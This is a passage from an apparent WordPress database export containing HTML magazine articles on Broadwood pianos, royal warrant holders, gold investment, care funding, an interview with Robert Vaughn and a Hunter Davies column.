Broadwood’s small team still makes pianos by hand in its workshops, based at Finchcock’s Musical Museum, Goudhurst, Kent.</p>&#13;\n<p>There are currently 20 to 30 Broadwood pianos, as well as other makes of pianos, placed throughout Buckingham Palace, Sandringham, Royal Lodge Windsor and St James’ Palace. Many are regularly maintained and tuned by Broadwood, which offers tuning and restoration.</p>&#13;\n<p>Musical ‘royalty’ have also valued Broadwood pianos. “Haydn practiced at Broadwood’s salon when playing in London in the 1790s,” said Laurence.</p>&#13;\n<p>In November 1817 the company gave a piano to Beethoven. “It was taken by boat to Trieste and then by horse and cart over the Alps. Beethoven received it in Vienna five months later,” said Laurence.</p>&#13;\n<p>Chopin was supplied with three grand pianos for London concerts in 1848, and Liszt used a Broadwood for mainly private recitals in London in 1886. On the same tour Liszt appeared at the Royal College of Music (RCM), close to a Broadwood, but did not intend to play.</p>&#13;\n<p>“RCM students threw daffodils grabbed from local parks, towards the piano, until he agreed to play. Our tuner had to clear the flowers out of the piano,” said Laurence.</p>&#13;\n<p>Even the apparently unremarkable Broadwood pianos can have historical value. The Broadwood archive service, used to value pianos, includes records going back to the 18th century. “One lady found that her small upright had belonged to Sir Arthur Sullivan,” said Laurence.</p>&#13;\n<div class=\"woo-sc-box normal   \"><em><strong>Broadwood</strong> has no email address, as it prefers to speak to customers by telephone on <strong>01580 212713</strong></em></div>&#13;\n<p> </p>&#13;\n									</div>','The key to success','368','publish','open','open','','the-key-to-success','','','2018-04-02 20:08:38','2018-04-02 20:08:38','',0,'http://westonspirit.org.uk/the-key-to-success.asp',0,'post','',0),(94,1,'2017-09-25 09:51:55','2017-09-25 09:51:55','<div class=\"entry\">&#13;\n                  <div class=\"sharethis_top_bar\">&#13;\n  <span class=\"st_email_buttons\" st_title=\"Trade and tradition\" st_url=\"http://westonspirit.org.uk/2011/12/trade-and-tradition/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Trade and tradition\" st_url=\"http://westonspirit.org.uk/2011/12/trade-and-tradition/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Trade and tradition\" st_url=\"http://westonspirit.org.uk/2011/12/trade-and-tradition/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Trade and tradition\" st_url=\"http://westonspirit.org.uk/2011/12/trade-and-tradition/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Trade and tradition\" st_url=\"http://westonspirit.org.uk/2011/12/trade-and-tradition/\" displaytext=\"share\"></span></div>&#13;\n                	                	                	<h4>Both distinguished histories and new technologies can be found among the 800 royal warrant holders</h4>&#13;\n<h3>Berry Bros &amp; Rudd</h3>&#13;\n<p>Established in 1698, first supplied wine to the royal family during George III’s reign and continues to do so until today. Berry holds two warrants, one for the Queen and one for the Prince of Wales</p>&#13;\n<h3>Buttons Saddlery</h3>&#13;\n<p>Warrant holder for 12 years, they also make equipment for stunt men and women, which has been used in films such as Superman and Lost in Space.</p>&#13;\n<h3>Firmin &amp; Sons</h3>&#13;\n<p>Makers of insignia and buttons. One of the UK’s longest-established companies and first granted a warrant by George III in 1796. Currently holds two. It also makes parts of the ceremonial uniform of the Household Cavalry.</p>&#13;\n<h3>John Broadwood &amp; Sons</h3>&#13;\n<p>The oldest piano company in the world. Mozart, Haydn and Chopin performed on the firm’s instruments and it was first granted a royal warrant by George II in 1740.</p>&#13;\n<h3><span style=\"text-decoration: underline;\"><strong><img class=\"alignright size-medium wp-image-1144\" title=\"Horse weigh\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Horse-weigh-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /></strong></span>Horse Weigh</h3>&#13;\n<p>Powys-based suppliers of equine weighing equipment (below) which helps determine the fitness and health of the royal horses.</p>&#13;\n<h3>Kinloch Anderson</h3>&#13;\n<p>Tailors and kiltmakers to the Queen, Duke of Edinburgh and Prince of Wales. Produces famous Balmoral tartan, designed by Prince Albert, which can only be worn with permission from Her Majesty – and by the Queen’s Piper whose kilt is made in it.</p>&#13;\n<h3>Henry Poole &amp; Co</h3>&#13;\n<p>One of several Savile Row tailors. Established in 1806, it has been granted royal warrants by numerous members of the royal family, from the Prince of Wales in 1863 and Queen Victoria in 1869 onwards. It was also granted imperial warrants by Napoleon III and Tsar Alexander II.</p>&#13;\n<h3>Lanz Group</h3>&#13;\n<p>A more recent warrant holder. The business helped clear up the devastation caused by the 1992 fire at Windsor Castle and now handles the castle’s recycling and waste disposal.</p>&#13;\n<h3>TIS Software</h3>&#13;\n<p>The Buckinghamshire firm has held a royal warrant for the supply of computer software to the Duke of Edinburgh since 1984.</p>&#13;\n									</div>','Trade and tradition','317','publish','open','open','','trade-and-tradition','','','2018-04-02 20:08:36','2018-04-02 20:08:36','',0,'http://westonspirit.org.uk/trade-and-tradition.asp',0,'post','',0),(95,1,'2018-01-18 15:08:35','2018-01-18 15:08:35','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Are you sold on gold?\" st_url=\"http://westonspirit.org.uk/2012/01/are-you-sold-on-gold/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Are you sold on gold?\" st_url=\"http://westonspirit.org.uk/2012/01/are-you-sold-on-gold/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Are you sold on gold?\" st_url=\"http://westonspirit.org.uk/2012/01/are-you-sold-on-gold/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Are you sold on gold?\" st_url=\"http://westonspirit.org.uk/2012/01/are-you-sold-on-gold/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Are you sold on gold?\" st_url=\"http://westonspirit.org.uk/2012/01/are-you-sold-on-gold/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Is gold still a worthwhile investment, or is its shine wearing off? Our amateur investor Tom McIntosh reports</h4>&#13;\n<p>Gold has its own special allure. Brides, Bond villains and Olympic hopefuls all covet it. Spandau Ballet rhapsodised about it. Gordon Brown was less fond of it, but investors have remained steadfastly loyal. It is the metal that people have turned to in times of economic, financial or political uncertainty as a way of trying to protect their hard-won wealth.</p>&#13;\n<p>Since the current turmoil began in 2007, the price of gold has risen from around $600 (£390) an ounce to peak in September 2016 at over $1,900 (£1,230) an ounce. It’s currently around $1,620 (£1,050) – so is it still a shining prospect?</p>&#13;\n<p><img class=\"alignright size-full wp-image-1505\" title=\"p3 Gold_Bars\" src=\"/wp-content/uploads/2012/01/p3-Gold_Bars.jpg\" alt=\"\" width=\"358\" height=\"358\" />The basic investment purpose of holding gold is to diversify a portfolio and to preserve capital over the longer term, while avoiding the purchasing power of money being eroded.</p>&#13;\n<p>At the moment, real interest rates remain low so there’s little joy there for savers and governments worldwide that are pumping liquidity into the system by a variety of methods. All this activity risks inflation in the future – backing up the fundamental arguments for investing gold.</p><div class=\"woo-sc-quote\"><p>There’s also a wide range of gold funds that are generally liquid and have more moderate costs – but there are some disadvantages with these, too</p></div>&#13;\n<p>Using gold as an investment can be done in a variety of ways. The most obvious is to buy gold bullion, though this can be expensive: the retail pricing mark-up, insurance and storage costs can add up to 10 or 15 per cent in fees.</p>&#13;\n<p>There’s also a wide range of gold funds that are generally liquid and have more moderate costs – but there are some disadvantages with these, too. First, most funds trade in gold on the London market and this gold is unallocated – which means that the fund is not registered as the owner of specific bars, but only holds the right to require the delivery of certain amounts of gold. Unallocated gold is not the investor’s property so the investor is lending the gold to the bank, rather like a cash deposit but without deposit protection.</p>&#13;\n<p>Exchange-traded funds (ETFs) – an investment fund traded on stock exchanges in the same way as stocks and shares – offer a relatively cheap way to access the gold market. On the other hand, they are paper assets, effectively just a pledge in paper form for gold bullion ownership. If the body providing the ETF failed, it would leave you – the investor – as a creditor. You could take physical delivery of gold though it is not encouraged – bad idea to have gold bars lying around the house, however vigilant your Neighbourhood Watch is.</p>&#13;\n<p>For an investment in gold to truly be worth the while, holders should as far as possible ensure that they have “undiluted exposure to the physical commodity” – in other words, your fund does not mix an investment in bullion with gold mining company shares, gold futures or other precious metals or their derivatives.</p>&#13;\n<p>And, if possible, it should be in allocated form – uniquely identifiable bars of gold, regularly audited, that the customer can go and see and touch and segregated from other metal held in the dealer’s vault – so that the risks from the failure of counterparties are kept to a minimum.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><img class=\"alignleft size-medium wp-image-1506\" title=\"Tom_bw\" src=\"/wp-content/uploads/2012/01/Tom_bw-300x199.jpg\" alt=\"\" width=\"180\" height=\"119\" /></strong></em></p>&#13;\n<p> </p>&#13;\n<p><em><strong>Tom McIntosh</strong> is a former chief executive of an asset management company and financial adviser. He may have an interest in any of the investment topics he writes about.</em></p>&#13;\n									</div>','Are you sold on gold?','585','publish','open','open','','are-you-sold-on-gold','','','2018-04-02 20:08:34','2018-04-02 20:08:34','',0,'http://westonspirit.org.uk/are-you-sold-on-gold.asp',0,'post','',0),(96,1,'2014-04-17 00:05:29','2014-04-17 00:05:29','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"From the silver screen to the Street\" st_url=\"http://westonspirit.org.uk/2012/01/from-the-silver-screen-to-the-street/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"From the silver screen to the Street\" st_url=\"http://westonspirit.org.uk/2012/01/from-the-silver-screen-to-the-street/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"From the silver screen to the Street\" st_url=\"http://westonspirit.org.uk/2012/01/from-the-silver-screen-to-the-street/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"From the silver screen to the Street\" st_url=\"http://westonspirit.org.uk/2012/01/from-the-silver-screen-to-the-street/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"From the silver screen to the Street\" st_url=\"http://westonspirit.org.uk/2012/01/from-the-silver-screen-to-the-street/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>He’s played presidents, conmen, billionaires and spies, and off-set Robert Vaughn is equally happy in a variety of roles – author, academic, teacher and, most of all, actor</h4>&#13;\n<p>Even by the very starry standards set by celebrity CVs, Robert Vaughn’s employment record is something of a blockbuster in its own right.</p>&#13;\n<p>He’s the star of some 150 movies, most notably The Magnificent Seven and Bullitt, and almost as many TV shows – from Bonanza and The Man From U.N.C.L.E. to The Protectors and The A Team.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1529\" title=\"Robert_Vaughn copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/Robert_Vaughn-copy.jpg\" alt=\"\" width=\"417\" height=\"496\" />It’s a prodigious output and one to make even fellow Hollywood long-stayers such as Michael Caine or Clint Eastwood look like work-shy underachievers. And Vaughn’s not finished yet.</p>&#13;\n<p>A committed Anglophile, he’s currently appearing in the final series of BBC1’s conmen caper Hustle and has squeezed in a cameo in Coronation Street, where he’s currently doing a turn as the wealthy new American beau of regular character Sylvia Goodwin (Stephanie Cole).</p>&#13;\n<p>And when I catch up with the 79-year-old at his Connecticut mansion, he is enjoying a well-earned break before his next film shoot which will mean crossing the Atlantic once more. Why, given he could surely afford to have retired long ago, does he continue to do it?</p><div class=\"woo-sc-quote\"><p>If acting hadn’t worked out, Vaughn’s original plan B was to go into sports journalism</p></div>&#13;\n<p>He quotes the opening sentences of his 2009 autobiography, A Fortunate Life: “A wise man once remarked, ‘If you do the thing you love, you’ll never have to work a day in your life.’ I did, and I haven’t.</p>&#13;\n<p>“It’s true that I’m busier than ever, but I’ll carry on as long as I’m vertical and reasonably articulate. I am going to go on and on like Margaret Thatcher,” he intones in an impressive baritone rendition of the Iron Lady’s famous pledge.</p>&#13;\n<p>His breakthrough role came in 1959 when he appeared opposite Paul Newman in The Young Philadelphians, a role that earned him an Oscar nomination, but it was as suave secret agent Napoleon Solo in the 60s TV hit The Man From U.N.C.L.E. in which he first achieved worldwide fame.</p>&#13;\n<p>And there’s quite a symmetry to Vaughn’s six-decade career, since he describes his role of scamster-in-chief Albert Stroller in Hustle as “a retired Napoleon Solo – no more cars and girls, but he still finds life exciting as a conman”.</p>&#13;\n<p>No wonder that the young Hustle cast see their “Mr V” as something of a guru, yet he doesn’t seem to take his status as an elder statesman too seriously. Significantly, he hesitates slightly before confirming his age to me, since performers often don’t act their age on stage and screen but simply ask directors how old they want them to be.</p>&#13;\n<p>But in an industry that is always reinventing itself, he stays ahead of the game by challenging himself with offbeat acting projects such as playing Paul Getty II in the US version of that well-known career-rebooter, Little Britain, explaining that he likes to work with people who make him laugh.</p>&#13;\n<p>As for the advantages of seniority, “I don’t think age confers any new freedoms as you get older, but people do tend to think you are wiser than you are,” he says.</p>&#13;\n<p>Vaughn’s lack of pomposity is one of his charms, and is also the reason why he continues to stay healthily alert and interested in the world beyond what he calls in his autobiography “the peculiar self-absorption of an actor”.</p>&#13;\n<p>Long assumed to be a diehard Democrat because of his friendship with the late Bobby Kennedy, he was the first actor to campaign publicly against the Vietnam War but now describes himself as politically independent.</p>&#13;\n<p>“I’m either a Democrat or a Republican, depending on the philosophy of the particular candidate,” he says. “I’ve played four American presidents – Wilson, Roosevelt twice, Truman and Nixon – but I never wanted to go into politics myself. I would rather play politicians on-screen.”</p>&#13;\n<p>He teaches masterclasses in acting at Yale from time to time and has a PhD in communications. His thesis subject was Hollywood blacklisting during the McCarthy era, later published as a book under the title Only Victims. However, the very ungrand Vaughn insists: “I’m only Dr Vaughn to my students.”</p>&#13;\n<p>There have been quite a few future A-listers among those pupils over the years, including a nervous young Jack Nicholson, whom Vaughn taught in his Sunday-afternoon Players’ Ring acting class in LA in the mid-50s. Despite the mere five-year age gap, he assumed the mentor role and found himself urging a disheartened Nicholson not to give up the business in 1967. Two years later, Nicholson shot to fame in Easy Rider.</p>&#13;\n<p>If acting hadn’t worked out, Vaughn’s original plan B was to go into sports journalism, and when he was drafted into the army, he became a drill instructor. Keeping fit continues to be very important to him, especially with the long filming days that TV budgets require, and he uses his home gym’s treadmill and weights machine – which he stresses is “the old-fashioned, freestanding kind” – almost daily.</p>&#13;\n<p>Neither does he neglect intellectual workouts, believing in a healthy mind as well as a healthy body. “I get up every morning, anxious to read the papers, because curiosity about life is what drives me,” he says. “I also read online, too. My wife has just bought me a Kindle for my birthday and I’m going to read a biography of Spencer Tracy and a book by Condoleezza Rice on it.”</p>&#13;\n<p>He married actress Linda Staab in 1974 and they have two adopted children, Cassidy, 35, who works in the motor industry, and Caitlin, 30, an animal anaesthetist.</p>&#13;\n<p>The Kindle should prove a useful companion between takes, for the last surviving member of The Magnificent Seven has just begun shooting a new British indie comedy film called The Magnificent Eleven for what one imagines is well below Vaughn’s usual pay scale, simply because the title, and the concept, tickled him so much. Instead of arriving on a horse, he turns up in a stretch limo.</p>&#13;\n<p>“I couldn’t resist that: the story of a low-end soccer team that can’t even afford jerseys. I play a menacing character called American Bob, because I’m very menacing both publicly and privately…”he says</p>&#13;\n<p>And with this latest series of Hustle the final one, what next for the rather magnificently multi-tasking Mr V? “Well,” he muses, “I might write another book . . .”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Hustle</strong> continues on BBC1 on Friday nights at 9pm.</em></p>&#13;\n									</div>','From the silver screen to the Street','1070','publish','open','open','','from-the-silver-screen-to-the-street','','','2018-04-02 20:08:33','2018-04-02 20:08:33','',0,'http://westonspirit.org.uk/from-the-silver-screen-to-the-street.asp',0,'post','',0),(97,1,'2015-07-02 08:24:02','2015-07-02 08:24:02','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get Up and Go – February\" st_url=\"http://westonspirit.org.uk/2012/01/get-up-and-go-issue-1/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get Up and Go – February\" st_url=\"http://westonspirit.org.uk/2012/01/get-up-and-go-issue-1/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get Up and Go – February\" st_url=\"http://westonspirit.org.uk/2012/01/get-up-and-go-issue-1/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get Up and Go – February\" st_url=\"http://westonspirit.org.uk/2012/01/get-up-and-go-issue-1/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get Up and Go – February\" st_url=\"http://westonspirit.org.uk/2012/01/get-up-and-go-issue-1/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>See our new-look Get Up And Go - Follow our columnist, Hunter Davies. Check out our great ideas for health, home and lifestyle. Read our interviews with stars of stage and screen. Find out what events are hot and what’s not in the coming month. See what our money writers have to say about the best ways to invest your hard-earned funds.</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120130100754-77d7fb1d92c54869a8766d5b2a8a999d&amp;docName=guag-issue-1&amp;username=Lyonsdown&amp;loadingInfoText=get%20up%20and%20go&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120130100754-77d7fb1d92c54869a8766d5b2a8a999d&amp;docName=guag-issue-1&amp;username=Lyonsdown&amp;loadingInfoText=get%20up%20and%20go&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Get Up and Go - Issue 1','76','publish','open','open','','get-up-and-go-issue-1','','','2018-04-02 20:08:32','2018-04-02 20:08:32','',0,'http://westonspirit.org.uk/get-up-and-go-issue-1.asp',0,'post','',0),(98,1,'2015-01-02 15:29:51','2015-01-02 15:29:51','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Handle with care\" st_url=\"http://westonspirit.org.uk/2012/01/handle-with-care/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Handle with care\" st_url=\"http://westonspirit.org.uk/2012/01/handle-with-care/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Handle with care\" st_url=\"http://westonspirit.org.uk/2012/01/handle-with-care/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Handle with care\" st_url=\"http://westonspirit.org.uk/2012/01/handle-with-care/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Handle with care\" st_url=\"http://westonspirit.org.uk/2012/01/handle-with-care/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Now is the time to take control of funding care for later life, says Linda Whitney</h4>&#13;\n<p>It’s something many of us are thinking about – how our care in later life is managed and funded.</p>&#13;\n<p>A social care overhaul is in the offing, with the government due to give a progress report on last year’s Dilnot Commission on the subject. Whether ministers act on the Dilnot advice whole or piecemeal, one certainty is that many more of us will have to cover the cost of care ourselves, possibly through dedicated investments.</p>&#13;\n<p>How to go about it can be confusing, and it doesn’t help when big players in the field make mistakes.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1511\" title=\"skd182760sdc\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/skd182760sdc-e1327685676427.jpg\" alt=\"\" width=\"347\" height=\"570\" />Last December HSBC was fined £10.5m after its subsidiary, Nursing Home Fees Agency, mis-sold investments to people who were more likely to die than reap the benefits.</p>&#13;\n<p>It’s enough to worry even the savviest investor, but with care home fees in the South East, for example, averaging around £29,000 a year – £42,000 with nursing care – the funding question must be faced.</p>&#13;\n<p>Firstly, check whether you are entitled to free care, or some help with fees – charity Age UK can help here (call them on 0800 169 6565).</p>&#13;\n<p>If you are self-funding, consult an independent financial adviser about options – and ensure that he or she has the CF8 qualification in long-term care funding advice.</p>&#13;\n<p>An immediate needs annuity – available from Partnership and Friends Life only – is the most commonly recommended route. The annuity is paid direct to the care provider, so is free of income tax, and the payments are usually higher than pension payments for healthy people.</p>&#13;\n<p>The annuity is guaranteed to pay out until you die and there are indexlinked options which allow for the increasing costs of care (rising by about 5 per cent annually). Insurance that pays all or part of the money back if you die in the first year is available.</p>&#13;\n<p>If you require an annuity to cover immediate care needs, there will be a one-off premium to pay. There are provider charges, too, and usually about 4 per cent of the premium is paid to the adviser as commission.</p>&#13;\n<p>“The average premium for these annuities that we have arranged over the past year was £115,000,” says Andrew Dixson- Smith of Care Fees Investment, a Member of the Society of Later Life Advisers.</p>&#13;\n<p>Raising the money may mean selling your house, though if your estate is worth more than the inheritance tax threshold – currently £325,000 – the annuity can be deducted from your estate, helping to reduce the 40 per cent inheritance tax bill.</p>&#13;\n<p>So what income can an annuity provide? The cost is based on age, gender and medical circumstances, but on average a £115,000 annuity will generate about £24,000 in care home fees payments annually – it’s usually bought to bridge the gap between care fees and other income from a pension and any state benefits.</p>&#13;\n<p>Investments can be used to pay care fees, but choice is limited and your minimum life expectancy should be at least five years.</p>&#13;\n<p>For under five years’ life expectancy, the choice should be nothing riskier than a savings account. However, with the best rate on a monthly income account currently under four per cent, you would have to invest hundreds of thousands to make enough to cover most or all of your care home fees without eroding your capital.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Tax cash from Constable</h3>&#13;\n<p>Your next tax payment could be hanging on your wall. A scheme to be introduced in the 2017 budget will allow you to pay tax bills with historical objects or works of art.</p>&#13;\n<p>Individual donors can cut their income and capital gains tax bills by up to 30 per cent of the value of the object they donate.</p>&#13;\n<p>“If you donate, say, a Turner worth £10m, you will be able to claim £3m off capital gains or income tax,” says Robert Blower of law firm Charles Russell.</p>&#13;\n<p>The scheme will be similar to the long-standing Acceptance in Lieu (AiL) scheme, which allows people to donate pre-eminent objects in return for a reduction in their inheritance tax bill. However, the new scheme will allow donations in the giver’s lifetime and the tax cut can be spread over five years.</p>&#13;\n<p></p><div id=\"attachment_1513\" class=\"wp-caption aligncenter\" style=\"width: 586px\"><img class=\"size-full wp-image-1513\" title=\"Stratford-Mill\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/Stratford-Mill-e1327685762968.jpg\" alt=\"\" width=\"576\" height=\"411\" /><p class=\"wp-caption-text\">Tax break: Constable’s Stratford Mill</p></div>&#13;\n<p>Financially, art owners might be better off selling their pre-eminent objects, says Blower. “If you sold your Turner at auction for £10m, you would receive about £7m after capital gains and auctioneer’s commission, whereas if you donate it, you will only get the £3m in tax reduction. However, the capital gains on the sale will be set aside, and you will get the satisfaction of donating something to the nation.”</p>&#13;\n<p>Pre-eminent object can include pictures, manuscripts, pieces of furniture, photographs, heritage objects and historic documents. Even entire houses may be considered.</p>&#13;\n<p>Items accepted under AiL, for instance, include John Constable’s Stratford Mill, painted in 1820, accepted in 1986 and now in the National Gallery, Clive of India’s elephant armour, now in the Royal Armouries, and Seaton Delaval, Sir John Vanburgh’s baroque house in Northumberland, now run by the National Trust.</p>&#13;\n<p>Objects will be accepted on a firstcome, first-served basis and passed on to an institution to put them on public view. However, donors can express a preference for where they want their objects to go.</p>&#13;\n<p>A panel of experts will make the decision whether or not to accept an item and at what value. There is no limit to the tax reduction available for each object or donor, but the overall limit of tax deductions for the new scheme and AiL combined will be £30m. <em>Linda Whitney</em></p>&#13;\n</div>&#13;\n									</div>','Handle with care','941','publish','open','open','','handle-with-care','','','2018-04-02 20:08:30','2018-04-02 20:08:30','',0,'http://westonspirit.org.uk/handle-with-care.asp',0,'post','',0),(100,1,'2015-09-27 08:14:30','2015-09-27 08:14:30','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> hdavies\" title=\"Posts by Hunter Davies\" rel=\"author\"&gt;Hunter Davies</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Hunter Davies\" st_url=\"http://westonspirit.org.uk/2012/01/hunter-davies/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Hunter Davies\" st_url=\"http://westonspirit.org.uk/2012/01/hunter-davies/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Hunter Davies\" st_url=\"http://westonspirit.org.uk/2012/01/hunter-davies/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Hunter Davies\" st_url=\"http://westonspirit.org.uk/2012/01/hunter-davies/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Hunter Davies\" st_url=\"http://westonspirit.org.uk/2012/01/hunter-davies/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Senior moment</h4>&#13;\n<p>When my wife was pregnant with our first child, back in – can’t have been that long ago, impossible, seems like yesterday, let me think, using both hands – back in l964, I got a call from the Royal Free Hospital to ask if I would like to come along to something brand new they were just starting: fathers’ classes.</p>&#13;\n<p>My first reaction was not great. I can learn about this wonderful act of nature and help my dear wife but, hurrah, that must be 1,000 words. Which it was. I did a piece for The Sunday Times’ women’s pages about fathers’ classes. Don’t remember how much I got for it, but I was well pleased.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1494\" title=\"Hunter Davies.Lyonsdown, Hunter Davies.\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/UNP-Lyonsdown-28120-A59345.jpg\" alt=\"\" width=\"358\" height=\"536\" />Don’t remember much about the birth either. It took forever and I got awfully hungry, so I decided to pop out and have a pie. When I got back, my wife had given birth – to Caitlin, and I had missed it all. I’ve never been forgiven.</p>&#13;\n<p>Our second child, a boy, was born in 1966, and he never slept for five years. That’s how it seemed at the time. Almost every night he appeared to have decided to fight the world, determined under no circumstances to give in and close his wretched eyes.</p>&#13;\n<p>I eventually did an article, about all the ruses we had tried, and failed with, which was called Jake the Wake. It got 500 letters in response. Letters? Came in rectangular bits of folded paper called envelopes. Now you remember them.</p>&#13;\n<p>After a gap of some eight years, we had a third child, Flora – our little flower, who, of course, quickly grew up, so by the time she was eight she was desperate to be 16. Or at least a teenager, like her big brother and sister and do all the awful teenage things they were enjoying. And she wanted to be 16 NOW, not have to wait another eight boring years.</p>&#13;\n<p>I did a sequence of books about her – long out of print, so I might as well mention them – about a girl called Flossie Teacake who, by a piece of magic, can go from eight to 16. At one time, they were bestsellers in Japan.</p>&#13;\n<p>Meanwhile, I had started a series of articles in Punch – now also gone – about my three children. It was suggested to me by the then editor, Alan Coren, who had observed that on the women’s pages it was always mothers grinding on about their family and their funny little ways.</p>&#13;\n<p>Why didn’t a father have his say? It was called Father’s Day and somehow it ran for 10 years and even became a TV series.</p>&#13;\n<p>But I made one awful mistake. In this series of article I always used the family’s real names, for I hated and still do columnists who use silly made-up names like Treasure, He Who Must Be Obeyed, Yummy Mummy, Alpha Dad or The Old Trout. Hold on, it was me who referred to my wife as The Old Trout, so delete that example.</p>&#13;\n<p>Made-up names always sound so, well, made-up, so you can’t believe anything they write. I wanted my little domestic saga to be genuine, to be the truth, as much as you ever can, or ever want to tell the truth.</p>&#13;\n<p>There was a time when Jake got really furious when masters at his school made snide remarks in the corridor about something I had written, which of course he had not read. Why would he be interested in such rubbish? So for a while I had to change his name to James, till he forgot about it.</p>&#13;\n<p>The problem with using real names, and real ages, is that they grow up. You can’t keep them at the same age and place and stage for ever the way Richmal Crompton could with Just William. So in the end, I ran out of copy. At least copy about my dear family and what it was like being their dear father.</p>&#13;\n<p>Which brings me to now. It has taken me a long time to admit to myself that I am old, which of course I half do not really believe, I am just saying it for effect, for you to say: “Really? I don’t believe it”.</p>&#13;\n<p>But from this year I will be forced to go along with the prevailing perception that someone of 75 must surely, undoubtedly, be – OLD.</p>&#13;\n<p>Actually, that’s a fib. I was 76 on January 7. See, still lying to myself. When I woke up that morning, I thought: “Hmm, that is old, I’ll have to admit it from now on.” But then I didn’t immediately go on to think: “Oh no, whatever will become of me? This new knee really has not worked. It’s downhill from now on with far worse to come – which old folks’ home should I put my name down for, or should I just book myself into that place in Switzerland?”</p>&#13;\n<p>Nope, I thought none of those boring, depressing, thoughts. What I honestly, genuinely did think to myself on admitting I was old was: “THINK OF ALL THE COPY!”</p>&#13;\n<p>There are now more people over 60 than under 16 – I just made that figure 